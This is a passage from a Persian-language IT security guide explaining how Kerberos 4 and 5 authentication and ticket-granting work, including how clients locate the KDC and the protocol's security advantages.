ﻫﺮﭼﻨﺪ ﺩﺭ ﻛﻨﺎﺭ Kerberos 4ﺍﺯ SSHﻫﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﺪﻩ ،ﺍﻣﺎ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺍﺳﺖ ﻛﻪ ﺩﻭ ﺳﻴﺴﺘﻢ ﺭﺍ ﻭﺍﺩﺍﺭ ﺑﻪ ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻧﻲ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻛـﺮﺩ .ﺧﻮﺷـﺒﺨﺘﺎﻧﻪ ﭘﺮﻭﺗﻜـﻞ
SSHﻧﮕﺎﺭﺵ ۲ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻻﻳﻪ ﺍﻣﻨﻴﺘﻲ ﻣﺸﺎﺑﻪ (GSSAPI) Kerberos 5ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ ،ﻛﻪ ﺑﺎﻋﺚ ﺳﺎﺩﻩ ﺷﺪﻥ ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﻣﺴﺎﺋﻞ ﻣﻲﺷﻮﺩ .ﭘﻴﺸﻨﻬﺎﺩ ﺍﻭﻟﻴﺔ ﻣﺮﺑـﻮﻁ
ﺑﻪ IETFﻛﻪ ﺍﺩﻏﺎﻡ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺭﺍ ﭘﻮﺷﺶ ﻣﻲﺩﻫﺪ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ .draft-ietf-secsh-gsskeyex
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
٣٣٩
ﺍﻭﻝ ﺍﻳﻨﻜﻪ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ Kerberosﺑﺎﻳﺪ ﺑﺪﺍﻧﺪ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ Kerberosﺭﺍ ﭼﮕﻮﻧﻪ ﭘﻴﺪﺍ ﻛﻨﺪ ،ﻛﻪ ﺑﺮﺍﻱ ﺍﻳﻦ ﺍﻣﺮ ﻣﻲﺗـﻮﺍﻥ ﻫـﺮ
ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺭﺍ ﺑﺼﻮﺭﺕ ﺩﺳﺘﻲ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻛﺮﺩ )ﺑﻄﻮﺭ ﺳﻨﺘﻲ ﺩﺭ ﻓﺎﻳﻞ ،(krb5.confﻳﺎ ﻣﻲﺗـﻮﺍﻥ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ Kerberosﺭﺍ ﺑـﺎ
ﺍﻗﻼﻡ ﺩﺍﺩﺓ DNS SRVﺍﻋـﻼﻡ ﻋﻤـﻮﻣﻲ ﻧﻤـﻮﺩ ،ﮐـﻪ ﺩﺭ ﺳـﻨﺪ IETF Internet-Draft draft-ietf-krv-wg-krb-dns-locate
ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻩ ﺍﺳﺖ.
ﺩﺭ Kerberos 4ﺑﻌﺪ ﺍﺯ ﺍﻳﻨﻜﻪ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻛﺮﺩﻳـﺪ ،ﺍﻳـﺴﺘﮕﺎﻩ ﻛـﺎﺭﻱ ﭘﻴـﺎﻣﻲ ﺭﺍ ﺑـﻪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ
Kerberosﻣﻲﻓﺮﺳﺘﺪ ١٧٥.ﺍﻳﻦ ﭘﻴﺎﻡ ﺣﺎﻭﻱ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﺷﻤﺎﺳﺖ ﻭ ﻧـﺸﺎﻥ ﻣـﻲﺩﻫـﺪ ﻛـﻪ ﺷـﻤﺎ ﺳـﻌﻲ ﺩﺍﺭﻳـﺪ ﻭﺍﺭﺩ ﺳﻴـﺴﺘﻢ ﺷـﻮﻳﺪ.
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ Kerberosﺩﺭ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﺧﻮﺩ ﭘﺮﻭﻧﺪﺓ ﺷﻤﺎ ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ ﻭ ﭼﻨﺎﻧﭽﻪ ﺷﻤﺎ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻛﺎﺭﺑﺮ ﻣﺠﺎﺯ ﺷـﻨﺎﺧﺘﻪ ﺷـﻮﻳﺪ،
ﻳﻚ ﺑﻠﻴﻂ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﺑﺮﺍﻳﺘﺎﻥ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺎ ﺧﻼﺻﻪﭘﻴﺎﻡ ﺭﻣﺰ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺍﺳﺖ .ﺳـﭙﺲ ﺍﻳـﺴﺘﮕﺎﻩ ﻛـﺎﺭﻱ ﺍﺯ ﺷـﻤﺎ
ﻣﻲﺧﻮﺍﻫﺪ ﻛﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻛﻨﻴﺪ ﻭ ﻧﻬﺎﻳﺘﹰﺎ ﺗﻼﺵ ﻣﻲﻛﻨﺪ ﺑﻠﻴﻂ ﺭﻣﺰﮔـﺬﺍﺭﻱﺷـﺪﻩ ﺭﺍ ﺑـﺎ ﺭﻣـﺰ ﻋﺒـﻮﺭﻱ ﻛـﻪ ﺷـﻤﺎ ﺍﺭﺍﺋـﻪ ﻛـﺮﺩﻩﺍﻳـﺪ
ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﺪ .ﺍﮔﺮ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺑﺎﺷﺪ ،ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺭﻣﺰ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﺍ ﺫﺧﻴﺮﻩ ﻧﻤﻲﻛﻨﺪ ،ﻭ ﻣﻨﺤﺼﺮﹰﺍ ﺍﺯ ﺑﻠـﻴﻂ ﺗـﺼﺪﻳﻖ ﺑﻠـﻴﻂ
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ .ﺍﮔﺮ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺑﻪ ﺷﻜﺴﺖ ﺑﻴﺎﻧﺠﺎﻣﺪ ،ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺧﻮﺍﻫﺪ ﺩﺍﻧﺴﺖ ﻛﻪ ﺷﻤﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﻧﺎﺩﺭﺳﺘﻲ ﺍﺭﺍﺋﻪ ﻛﺮﺩﻩﺍﻳﺪ ﻭ ﺍﺯ ﺷـﻤﺎ
ﻣﻲﺧﻮﺍﻫﺪ ﻣﺠﺪﺩﹰﺍ ﺑﺮﺍﻱ ﻭﺍﺭﺩ ﻛﺮﺩﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺻﺤﻴﺢ ﺗﻼﺵ ﻛﻨﻴﺪ.
ﺩﺭ ،Kerberos 5ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻗﺒﻞ ﺍﺯ ﺗﻤﺎﺱ ﺑﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻣﻨﺘﻈﺮ ﻣﻲﻣﺎﻧﺪ ﺗﺎ ﺷﻤﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻛﻨﻴﺪ .ﺁﻧﮕﺎﻩ ﻳـﻚ ﭘﻴـﺎﻡ
ﺣﺎﻭﻱ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﻭ ﺗﺎﺭﻳﺦ ﻫﻤﺎﻧﺮﻭﺯ -ﻛﻪ ﺑﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷـﺪﻩ -ﺑـﻪ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺗـﺼﺪﻳﻖ ﻫﻮﻳـﺖ Kerberos
ﻣﻲﻓﺮﺳﺘﺪ .ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺪﻧﺒﺎﻝ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﺷﻤﺎ ﻣﻲﮔﺮﺩﺩ ،ﺭﻣﺰ ﻋﺒﻮﺭ ﺷﻤﺎ ﺭﺍ ﻣﻲﻳﺎﺑﺪ ،ﻭ ﺗﻼﺵ ﻣﻲﻛﻨـﺪ ﺗـﺎﺭﻳﺦ ﺭﻣﺰﮔـﺬﺍﺭﻱﺷـﺪﻩ ﺭﺍ
ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﺪ .ﺍﮔﺮ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺘﻮﺍﻧﺪ ﺗﺎﺭﻳﺦ ﺍﺭﺳﺎﻟﻲ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﺪ )ﻛﻪ ﻃﺒﻴﻌﺘﹰﺎ ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺁﻥ ﺗﺎﺭﻳﺦ ،ﺗﺎﺭﻳﺦ ﻫﻤﺎﻧﺮﻭﺯ ﺧﻮﺍﻫﺪ ﺑـﻮﺩ( ﺁﻧﮕـﺎﻩ
١٧٦
ﻳﻚ ﺑﻠﻴﻂ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ ،ﺁﻧﺮﺍ ﺑﺎ ﺭﻣﺰ ﻋﺒﻮﺭﺗﺎﻥ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﺪ ،ﻭ ﺳﭙﺲ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﻲﻓﺮﺳﺘﺪ.
ﺑﻠﻴﻂ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﻳﻚ ﺑﻠﻮﻙ ﺩﺍﺩﻩ ﺍﺳﺖ ﺣﺎﻭﻱ ﻳﻚ ﻛﻠﻴﺪ ﻧﺸﺴﺖ ﻭ ﻳﻚ ﺑﻠﻴﻂ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲ ﺑﻠﻴﻂ ﺗـﺼﺪﻳﻖ ﺑﻠـﻴﻂ - Kerberosﻛـﻪ
ﻫﻢ ﺑﺎ ﻛﻠﻴﺪ ﻧﺸﺴﺖ ﻭ ﻫﻢ ﺑﺎ ﻛﻠﻴﺪ ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ .ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻛﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ
ﺑﻠﻴﻂ Kerberosﺗﻤﺎﺱ ﺑﮕﻴﺮﺩ ﺗﺎ ﺑﺮﺍﻱ ﻫﺮ ﻣﻮﻛﻞ ﺩﺭﻭﻥ ﻗﻠﻤﺮﻭﻱ - Kerberosﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎ ﻭ ﻛـﺎﺭﺑﺮﺍﻧﻲ ﻛـﻪ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ Kerberosﺁﻧﻬﺎ ﺭﺍ ﻣﻲﺷﻨﺎﺳﺪ -ﺑﻠﻴﻂ ﺑﺪﺳﺖ ﺁﻭﺭﺩ.
۱۷۵ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻣﻘﺎﻻﺕ ﻭ ﺍﺳﻨﺎﺩ ،kerberosﺍﺯ ﻧﻈﺮ ﻣﻨﻄﻘﻲ ﺩﻭ ﻧﻮﻉ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ kerberosﻭﺟﻮﺩ ﺩﺍﺭﺩ :ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ،ﻭ ﺳﺮﻭﻳﺲ ﺗـﺼﺪﻳﻖ ﺑﻠـﻴﻂ.
ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﺻﺎﺣﺒﻨﻈﺮﺍﻥ ﻓﻜﺮ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺍﻳﻦ ﺗﻠﻘﻲ ﺩﻗﻴﻖ ﻧﻴﺴﺖ ،ﭼﻮﻥ ﻫﻤﻪ ﺳﻴﺴﺘﻢ kerberosﺑﺼﻮﺭﺕ ﻓﻴﺰﻳﻜـﻲ ﺗﻨﻬـﺎ ﻳـﻚ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ -ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ
،kerberosﻳﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻛﻠﻴﺪ -ﺭﺍ ﺑﻜﺎﺭ ﻣﻲﮔﻴﺮﺩ.
۱۷۶ﭼﺮﺍ ﭘﺮﻭﺗﻜﻞ ﺗﻐﻴﻴﺮ ﻳﺎﻓﺖ؟ Kerberos 4ﺗﻼﺵ ﻣﻲﻛﺮﺩ ﺗﻌﺪﺍﺩ ﺩﻓﻌﺎﺗﻲ ﻛﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮ ﺩﺭ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺫﺧﻴﺮﻩ ﻣﻲﺷﺪ ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﺑﺮﺳﺎﻧﺪ .ﻣﺘﺄﺳﻔﺎﻧﻪ ،ﺍﻳﻦ ﻣﺴﺌﻠﻪ
ﺑﺎﻋﺚ ﺷﺪ ﺑﺮﺍﺣﺘﻲ ﺑﺘﻮﺍﻥ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﻠﻴﻂ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ Kerberso 4ﺭﺍ ﺑﺼﻮﺭﺕ offlineﺣﺪﺱ ﺯﺩ .ﺩﺭ Kerberos 5ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺑﺎﻳﺪ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ
ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ kerberosﻧﺸﺎﻥ ﺩﻫﺪ ﻛﻪ ﻛﺎﺭﺑﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﺻﺤﻴﺢ ﺭﺍ ﻣﻲﺩﺍﻧﺪ .ﺍﻳﻦ ﻳﻚ ﺳﻴﺴﺘﻢ ﺍﻣﻦﺗﺮ ﺍﺳﺖ ،ﻫﺮﭼﻨﺪ ﭼﻮﻥ ﺑﻠﻴﻂ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﻛﺎﺭﺑﺮ ﺍﺯ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﻪ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻓﺮﺳﺘﺎﺩﻩ ﻣﻲﺷﻮﺩ ،ﻟﺬﺍ ﻫﻤﭽﻨﺎﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻮﺳﻴﻠﻪ ﻳﻚ ﻣﻬﺎﺟﻢ ﺩﺯﺩﻳﺪﻩ ﺷﻮﺩ ﻭ ﺑﺎ ﻳﻚ ﺟﺴﺘﺠﻮﻱ ﻛﻠﻴﺪ ﻛﺎﻣﻞ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻭﺍﻗﻊ ﮔﺮﺩﺩ.
ﺑﺨﺶ ﭘﻨﺠﻢ
ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﻭﻗﺘﻲ ﻛﺎﺭﺑﺮ ﺑﺮﺍﻱ ﺑﺎﺭ ﺍﻭﻝ ﺗﻼﺵ ﻣﻲﻛﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ Kerberosﺑﻪ ﻓﺎﻳﻠﻬﺎﻱ ﺧﻮﺩ ﺩﺳﺘﺮﺳﻲ ﭘﻴـﺪﺍ ﻛﻨـﺪ،
ﻧﺮﻡﺍﻓﺰﺍﺭ ﺳﻴﺴﺘﻢ ﺭﻭﻱ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﺑﺎ ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﺗﻤﺎﺱ ﻣﻲﮔﻴـﺮﺩ ﻭ ﺗﻘﺎﺿـﺎﻱ ﻳـﻚ ﺑﻠـﻴﻂ ﺑـﺮﺍﻱ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﻓﺎﻳـﻞ
ﻣﻲﻓﺮﺳﺘﺪ .ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﺑﻪ ﻛﺎﺭﺑﺮ ﻳﻚ ﺑﻠﻴﻂ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻓﺎﻳﻞ ﺑﺎﺯ ﻣﻲﮔﺮﺩﺍﻧﺪ .ﺑﻠﻴﻂ ﻓﺮﺳﺘﺎﺩﻩ ﺷـﺪﻩ ﺣـﺎﻭﻱ ﻳـﻚ ﺑﻠـﻴﻂ
ﺩﻳﮕﺮ ﺍﺳﺖ ،ﻛﻪ ﺑﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻓﺎﻳﻞ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺍﺳﺖ ،ﻭ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻛﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﺩﺭﺧﻮﺍﺳﺖ ﻓﺎﻳﻠﻬﺎ ﺁﻧـﺮﺍ ﺑـﻪ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻓﺎﻳﻞ ﺍﺭﺍﺋﻪ ﻛﻨﺪ .ﺑﻠﻴﻂ ﻳﺎﺩﺷﺪﻩ ﺣﺎﻭﻱ ﻧﺎﻡ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﺪﺓ ﻛﺎﺭﺑﺮ ،ﺯﻣﺎﻥ ﺍﻧﻘﻀﺎ ﻭ ﺁﺩﺭﺱ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺍﻳﺴﺘﮕﺎﻩ ﻛـﺎﺭﻱ ﻛـﺎﺭﺑﺮ
ﺍﺳﺖ .ﺳﭙﺲ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻛﺎﺭﺑﺮ ﺍﻳﻦ ﺑﻠﻴﻂ ﺭﺍ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻓﺎﻳﻞ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ .ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻓﺎﻳﻞ ﺑﻠﻴﻂ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰ ﻋﺒﻮﺭ
ﺧﻮﺩ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﻛﻨﺪ ،ﻭ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﻳﻚ ﻧﮕﺎﺷﺖ ﻣﻴﺎﻥ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻛﺎﺭﺑﺮ ) ،UIDﺁﺩﺭﺱ (IPﻭ ﻳﻚ UIDﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﻓﺎﻳـﻞ
ﻣﻲﺳﺎﺯﺩ Kerberos .ﺯﻣﺎﻥ ﺭﻭﺯ ﺭﺍ ﺩﺭ ﺗﻘﺎﺿﺎﻫﺎ ﻣﻲﮔﺬﺍﺭﺩ ﺗﺎ ﺍﺯ ﺩﺯﺩﻳﺪﻩ ﺷﺪﻥ ﻳﻚ ﺗﻘﺎﺿﺎ ﻭ ﺍﻧﺘﻘﺎﻝ ﺁﻥ ﺍﺯ ﻣﻴﺰﺑﺎﻥ ﻣﺸﺎﺑﻪ ﺩﺭ ﺯﻣﺎﻧﻬـﺎﻱ ﺑﻌـﺪ
)ﻣﺜ ﹰﻼ ﺩﺭ ﻳﻚ ﺣﻤﻠﻪ ﺗﻜﺮﺍﺭ ﺗﻮﺳﻂ ﻳﻚ ﻣﻬﺎﺟﻢ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﻛﻨﻨﺪﻩ( ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ.
٣٤٠
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
Kerberosﺍﺯ ﻧﻈﺮ ﺍﻣﻨﻴﺘﻲ ﭼﻨﺪ ﻣﺰﻳﺖ ﺩﺍﺭﺩ .ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﺠﺎﻱ ﺫﺧﻴـﺮﻩ ﺷـﺪﻥ ﺩﺭ ﺍﻳـﺴﺘﮕﺎﻫﻬﺎﻱ ﻛـﺎﺭﻱ ﻣﻨﻔـﺮﺩ ﺩﺭ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ
Kerberosﺫﺧﻴﺮﻩ ﻣﻲﺷﻮﻧﺪ ﻭ ﻫﺮﮔﺰ ﺍﺯ ﺭﻭﻱ ﺷﺒﻜﻪ ﺍﻧﺘﻘﺎﻝ ﻧﻤﻲﻳﺎﺑﻨﺪ -ﺑﺼﻮﺭﺕ ﺭﻣﺰﺷﺪﻩ ﻳﺎ ﻫﺮ ﻃـﻮﺭ ﺩﻳﮕـﺮ .ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﺓ ﺗـﺼﺪﻳﻖ
ﻫﻮﻳﺖ Kerberosﻣﻲﺗﻮﺍﻧﺪ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮ ﺭﺍ ﺗﺼﺪﻳﻖ ﻛﻨﺪ ،ﭼﻮﻥ ﻛﺎﺭﺑﺮ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﻣﻲﺩﺍﻧﺪ ،ﻭ ﻫﻤﻴﻨﻄﻮﺭ ﻛﺎﺭﺑﺮ ﻫﻢ ﻣﻲﺗﻮﺍﻧﺪ ﻫﻮﻳـﺖ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ Kerberosﺭﺍ ﺗﺼﺪﻳﻖ ﻛﻨﺪ ،ﭼﻮﻥ ﺁﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻫﻢ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮ ﺭﺍ ﻣﻲﺩﺍﻧﺪ .ﭼﻮﻥ ﻛﺎﺭﺑﺮ ﻳﻚ ﺑﻠﻴﻂ ﺻﺎﺩﺭ ﺷـﺪﻩ
ﺑﻮﺳﻴﻠﺔ ﺳﺮﻭﻳﺲ ﺗﺼﺪﻳﻖ ﺑﻠﻴﻂ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺎ ﻛﻠﻴﺪ ﺳﺮﻭﻳﺲ ﻣﻘﺼﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ ﺍﺳﺖ ﺧﺪﻣﺎﺕ ﺩﻳﮕﺮ Kerberosﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨـﺪ
ﻛﺎﺭﺑﺮ ﺭﺍ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﻨﻨﺪ.
ﻛﺴﻲ ﻛﻪ ﺑﺮﺍﻱ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﻳﻚ ﺑﻠﻴﻂ ﺭﺍ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ Kerberosﻣـﻲﺩﺯﺩﺩ ﻧﻤـﻲﺗﻮﺍﻧـﺪ ﺍﺯ ﺁﻥ ﺍﺳـﺘﻔﺎﺩﻩ ﻛﻨـﺪ ﭼـﻮﻥ ﺑـﺎ ﻛﻠﻴـﺪﻱ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ )ﻛﻠﻴﺪ ﻳﻚ ﺳﺮﻭﻳﺲ Kerberosﻭ ﻳﺎ ﺑﺪﺳﺖ ﺁﻣﺪﻩ ﺍﺯ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﺎﺭﺑﺮ( ﻛﻪ ﻣﻬﺎﺟﻢ ﺁﻧﺮﺍ ﻧﻤﻲﺷﻨﺎﺳﺪ.
ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ،ﻳﮑﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ ﺩﺍﺩﻩ ،ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ
ﻲ ﻣـﻮﻛﻼﻥ ﺭﻭﻱ ﺷـﺒﻜﻪ ﺍﺳـﺖ .ﺩﺭ ﺣﺎﻟـﺖ ﻋـﺎﺩﻱ ﺍﺯ
Kerberosﻳﻚ ﺳﻴﺴﺘﻢ ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺑﻪ ﺍﺷـﺘﺮﺍﻙﮔـﺬﺍﺭﻱ ﻛﻠﻴـﺪﻫﺎﻱ ﺧـﺼﻮﺻ ﹺ
Kerberosﺗﻨﻬﺎ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ .ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﺗﻮﺍﻧﺎﻳﻲ ﺗﺒﺎﺩﻝ ﻛﻠﻴﺪﻫﺎ ﻫﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺑـﺮﺍﻱ ﺗـﻀﻤﻴﻦ ﻳﮑﭙـﺎﺭﭼﮕﻲ ﻭ
ﺻﺤﺖ ﺩﺍﺩﻩ ﻭ ﺳﺮﻱ ﺑﺎﻗﻲ ﻣﺎﻧﺪﻥ ﺁﻥ ﺑﻜﺎﺭ ﺭﻭﺩ.
ﺍﮔﺮ ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﻳﻚ ﺗﻬﺪﻳﺪ ﺟﺪﻱ ﺑﺎﺷﺪ ،ﻣﻲﺗﻮﺍﻥ ﻛﻠﻴﺔ ﺍﻃﻼﻋﺎﺕ ﺍﻧﺘﻘﺎﻟﻲ ﻣﻴﺎﻥ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻭ ﺳﺮﻭﻳﺲ ﺭﺍ ﺑﺎ ﻳﻚ ﻛﻠﻴـﺪ ﻛـﻪ ﻣﻴـﺎﻥ ﺩﻭ
ﻣﻮﻛﻞ ﻣﺒﺎﺩﻟﻪ ﺷﺪﻩ ﺍﺳﺖ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﺮﺩ .ﻣﺘﺄﺳﻔﺎﻧﻪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺎﻋﺚ ﻛـﺎﻫﺶ ﻛـﺎﺭﺍﻳﻲ ﻣـﻲﺷـﻮﺩ .ﺩﺭ MITﺍﺯ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺑـﺮﺍﻱ ﺍﻧﺘﻘـﺎﻝ
